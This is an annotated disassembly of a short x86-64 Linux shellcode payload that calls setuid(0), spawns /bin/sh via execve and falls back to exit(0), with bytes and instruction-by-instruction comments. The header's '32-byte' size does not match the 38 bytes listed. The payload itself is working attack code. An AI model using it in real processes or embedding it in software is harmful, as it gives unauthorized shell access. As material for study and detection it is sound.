; ---------------------------------------------------------------------------
; Annotated disassembly (Intel syntax) of a 32-byte x86-64 Linux fragment
; that issues three raw syscalls in sequence: setuid(0), execve("/bin/sh",
; NULL, NULL), exit(0). Columns: address · encoded bytes · instruction · note.
; No libc is involved, so the syscall sequence itself is the observable
; behaviour (the kind of thing syscall tracing / seccomp / audit logging see).
; Addresses assume the bytes start at 0x400078; the only address-dependent
; element is the RIP-relative lea at 0x400080, which is checked at the end.
; None of the syscall return values is checked.
; ---------------------------------------------------------------------------

; ============ setuid(0) ============
0x400078: 31 c0             xor eax, eax            ; zero rax first so the 8-bit write below yields rax = 0x69 (no stale upper bits)
0x40007a: 31 ff             xor edi, edi            ; arg0: uid = 0
0x40007c: b0 69             mov al, 0x69            ; syscall NR = 105 = __NR_setuid
0x40007e: 0f 05             syscall                 ; → setuid(0); sets EUID to root only if the process already holds that privilege — result is not checked

; ============ execve("/bin/sh", NULL, NULL) ============
0x400080: 48 8d 3d          lea rdi, [rip+0xf]      ; rdi = 0x400096 → "/bin/sh" (RIP-relative; RIP here is the address of the next instruction)
          0f 00 00 00                               ; disp32 continuation of the lea above (wrapped in the original dump)
0x400087: 31 f6             xor esi, esi            ; arg1: argv = NULL
0x400089: 6a 3b             push 0x3b               ; 2-byte push/pop pair instead of a 5-byte mov eax, imm32
0x40008b: 58                pop rax                 ; syscall NR = 59 = __NR_execve
0x40008c: 99                cdq                     ; rdx = 0 (envp = NULL): sign-extends eax = 0x3b (positive) into edx
0x40008d: 0f 05             syscall                 ; → execve("/bin/sh", NULL, NULL); on success this never returns

; ============ exit(0) (fallback if execve fails) ============
0x40008f: 31 ff             xor edi, edi            ; arg0: status = 0
0x400091: 6a 3c             push 0x3c
0x400093: 58                pop rax                 ; syscall NR = 60 = __NR_exit
0x400094: 0f 05             syscall                 ; → exit(0)

; ============ string data ============
0x400096: 2f 62 69 6e 2f 73 68 00                   ; "/bin/sh\0" — NUL-terminated path, immediately after the code
; ^ LEA target check: RIP(0x400087) + 0xf = 0x400096 ✓ (address of the instruction after the 7-byte lea, plus its displacement)